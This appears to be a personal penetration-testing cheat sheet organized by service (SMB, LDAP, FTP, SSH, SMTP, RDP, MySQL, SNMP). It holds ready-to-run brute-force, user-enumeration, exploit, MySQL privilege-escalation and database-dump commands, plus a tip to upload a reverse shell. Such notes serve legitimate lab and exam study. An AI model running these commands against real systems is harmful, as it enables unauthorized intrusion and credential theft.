Standalone Methodology

(In-Progress) Workflow

Initial Enumeration

Nmap scan

nmap -sC -sV -Pn <IP> 
nmap -sC -sV -Pn -oN <OUTPUT FILE> <IP>
nmap -sC -sV -p 1-65535 -Pn -oN <OUTPUT FILE> <IP> # Only run this if completely stuck
sudo nmap -sU -Pn <IP>
sudo nmap -sU -Pn -oN <OUTPUT FILE> <IP>

Enumeration for Windows Machine (MUST RUN IF TARGET IS WINDOWS)

enum4linux -a <IP>
enum4linux -a -u 'guest' -p '' <IP>
enum4linux -a -u <USERNAME> -p <PASSWORD> <IP>

Adding to host files

echo "<IP> <HOSTNAME>" | sudo tee -a /etc/hosts

SMB (TCP Port 139,445)

smbmap -H <IP>
smbmap -u <USERNAME> -p <PASSWORD> -H <IP>

Connection to shares

smbclient //<IP>/<sharename> -N
smbclient //<IP>/<sharename> -U guest
smbclient //<IP>/<sharename> -U <DOMAIN>/<USERNAME>

SMB Vulnerabilty Scan

nmap --script smb-vuln* <IP>

Enumerating users by bruteforcing RID

nxc smb <IPADDR>/32 -u 'USERNAME' -p 'PASSWORDHERE' --rid-brute

LDAP

TCP Port 389, 636(LDAPS), 3268 (AD), 3269(LDAPS in AD)

Enumeration LDAP with Null Credentials

nmap -n -sV --script "ldap* and not brute" <IP>

Probing LDAP Further

ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"

FTP (TCP Port 21)

Username: anonymous

Password: Empty

Brute Force

Here you can find a nice list with default ftp credentials: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt

hydra -L <USERLIST> -P <PASSWORDLIST> <IP> ftp

medusa -h <IP> -u <USER> -P <PASSWORDLIST> -M ftp

Nmap script enumeration

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Vulnerability scanning

nmap --script=ftp-* -p 21 <IP>

Enumeration of users

https://github.com/pentestmonkey/ftp-user-enum

ftp-user-enum.pl -U <USERLIST> -t <IP>

ftp-user-enum.pl -M iu -U <USERLIST> -t <IP>

Command

binary = Switches to binary transfer mode.
ascii = Switch to ASCII transfer mode

Configuration files to look out

ftpusers
ftp.conf
proftpd.conf

Vulnerable versions

ProFTPD-1.3.3c Backdoor
ProFTPD 1.3.5 Mod_Copy Command Execution
VSFTPD v2.3.4 Backdoor Command Execution

SSH (TCP Port 22)

User enumeration

https://www.exploit-db.com/exploits/40136

python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt <IP>

Connection

ssh <username>@<IP>
ssh -i <key file name> <username>@<IP>

Brute Force

hydra -c -V -l <username> -p <password> <IP> ssh
hydra -L <userlist> -P <passwordlist> <IP> ssh
medusa -h <IP> -U <userlist> -P <passwordlist> -M ssh
ncrack -v -U <userlist> -P <passwordlist> <IP>:<SSH Port>

Path of id_rsa

<USERHOME>/.ssh/id_rsa
<USERHOME>/.ssh/authorized\ key

Cracking id_rsa

Use ssh2john

Configuration files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts

SMTP (TCP Port 25)

User enumeration

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t <IP>
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt  -t <IP>

Brute-force

hydra -P /usr/share/wordlistsnmap.lst <IP> smtp -V

To check if user exists

VRFY <username>

Check if user belongs to mailing list

EXPN <username>

Enumeration and vulnerability scanning

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <IP>

RDP (TCP Port 3389)

Nmap scripts

nmap -p <RDP Port> --script rdp-ntlm-info <IP>

Brute-force

ncrack -vv --user <username> -P <passwordlist> rdp://<IP>
hydra -t 4  -l <username> -P <passwordlist> rdp://<IP>
hydra -V -f -L <userlist> -P <passwordlist> rdp://<IP>

POP3 (TCP Port 110)

Connecting to the service

telnet <IP> <POP3 Port>

Command

List all the messages in the user's account

LIST

MySQL (TCP Port 3306)

Nmap Scanning

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP> -p <MySQL Port>
nmap -sV -Pn -vv --script=mysql* <IP> -p <MySQL Port>

User Defined Functions

Privilege Escalation with MySQL User Defined FunctionsMedium

If MySQL is running as root and have access, can run these command

mysql> select do_system('id');
mysql> \! sh

Credential Guessing

Always try root:root credentials

Username Enumeration

nmap –script=mysql-enum –script-args userdb=<userlist> <IP>

Connection

mysql -h <IP> -P <MySQL Port>
mysql -h <IP> -u <username> -p <password>
mysql -u root -p

MySQL server configuration file names

Unix

my.cnf
/etc/mysql
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf

Windows

config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/

Log Files

connections.log
update.log
common.log

Command History

~/.mysql.history

Finding passwords to MySQL

Gain access to shell by uploading a reverse shell, might need to escalate privileges
Look into the database and see what users and passwords that are available
/var/www/html/configuration.php

Getting all the information from inside the database

mysqldump -u <username> -p <password> --all-databases --skip-lock-tables

SNMP (UDP Port 161)

Enumerate Community strings

./onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP>
python snmpbrute.py -t <IP>
nmap -sU <IP> -p161 --script=snmp-brute  -Pn --script-args snmp-brute.communitiesdb=list.txt
snmp-check <IP> -c <Community string>

Nmap scripts

nmap -sU -p161 --script "snmp-*" <IP>
nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat <IP>

snmpwalk

snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v2 <IP> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v2c <IP> 1.3.6.1.4.1.77.1.2.25

SNMPv3 enumeration

wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb; ./snmpv3enum.rb

Wordlist

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

SNMP MIB Trees

1.3.6.1.2.1.25.1.6.0 - System Processes
1.3.6.1.2.1.25.4.2.1.2 - Running Programs
1.3.6.1.2.1.25.4.2.1.4 - Processes Path
1.3.6.1.2.1.25.2.3.1.4 - Storage Units
1.3.6.1.2.1.25.6.3.1.2 - Software Name
1.3.6.1.4.1.77.1.2.25 - User Accounts
1.3.6.1.2.1.6.13.1.3 - TCP Local Ports

Formatting JSON output

echo '<JSON OUTPUT>' | jq '.'

PreviousSecurity Stuff NextChecklist

Last updated 1 year ago

hashtagInitial Enumeration

hashtagNmap scan

hashtagEnumeration for Windows Machine (MUST RUN IF TARGET IS WINDOWS)

hashtagAdding to host files

hashtagSMB (TCP Port 139,445)

hashtagShare Permission Enumeration

hashtagConnection to shares

hashtagSMB Vulnerabilty Scan

hashtagEnumerating users by bruteforcing RID

hashtagLDAP

hashtagEnumeration LDAP with Null Credentials

hashtagProbing LDAP Further

hashtagFTP (TCP Port 21)

hashtagAnonymous Login

hashtagBrute Force

hashtagNmap script enumeration

hashtagVulnerability scanning

hashtagEnumeration of users

hashtagCommand

hashtagConfiguration files to look out

hashtagVulnerable versions

hashtagSSH (TCP Port 22)

hashtagUser enumeration

hashtagConnection

hashtagBrute Force

hashtagPath of id_rsa

hashtagCracking id_rsa

hashtagConfiguration files

hashtagSMTP (TCP Port 25)

hashtagUser enumeration

hashtagBrute-force

hashtagTo check if user exists

hashtagCheck if user belongs to mailing list

hashtagEnumeration and vulnerability scanning

hashtagRDP (TCP Port 3389)

hashtagNmap scripts

hashtagBrute-force

hashtagPOP3 (TCP Port 110)

hashtagConnecting to the service

hashtagCommand

hashtagMySQL (TCP Port 3306)

hashtagNmap Scanning

hashtagUser Defined Functions

hashtagCredential Guessing

hashtagUsername Enumeration

hashtagConnection

hashtagMySQL server configuration file names

hashtagUnix

hashtagWindows

hashtagLog Files

hashtagCommand History

hashtagFinding passwords to MySQL

hashtagGetting all the information from inside the database

hashtagSNMP (UDP Port 161)

hashtagEnumerate Community strings

hashtagNmap scripts

hashtagsnmpwalk

hashtagSNMPv3 enumeration

hashtagWordlist

hashtagSNMP MIB Trees

hashtagFormatting JSON output

Initial Enumeration

Nmap scan

Enumeration for Windows Machine (MUST RUN IF TARGET IS WINDOWS)

Adding to host files

SMB (TCP Port 139,445)

Share Permission Enumeration

Connection to shares

SMB Vulnerabilty Scan

Enumerating users by bruteforcing RID

LDAP

Enumeration LDAP with Null Credentials

Probing LDAP Further

FTP (TCP Port 21)

Anonymous Login

Brute Force

Nmap script enumeration

Vulnerability scanning

Enumeration of users

Command

Configuration files to look out

Vulnerable versions

SSH (TCP Port 22)

User enumeration

Connection

Brute Force

Path of id_rsa

Cracking id_rsa

Configuration files

SMTP (TCP Port 25)

User enumeration

Brute-force

To check if user exists

Check if user belongs to mailing list

Enumeration and vulnerability scanning

RDP (TCP Port 3389)

Nmap scripts

Brute-force

POP3 (TCP Port 110)

Connecting to the service

Command

MySQL (TCP Port 3306)

Nmap Scanning

User Defined Functions

Credential Guessing

Username Enumeration

Connection

MySQL server configuration file names

Unix

Windows

Log Files

Command History

Finding passwords to MySQL

Getting all the information from inside the database

SNMP (UDP Port 161)

Enumerate Community strings

Nmap scripts

snmpwalk

SNMPv3 enumeration

Wordlist

SNMP MIB Trees

Formatting JSON output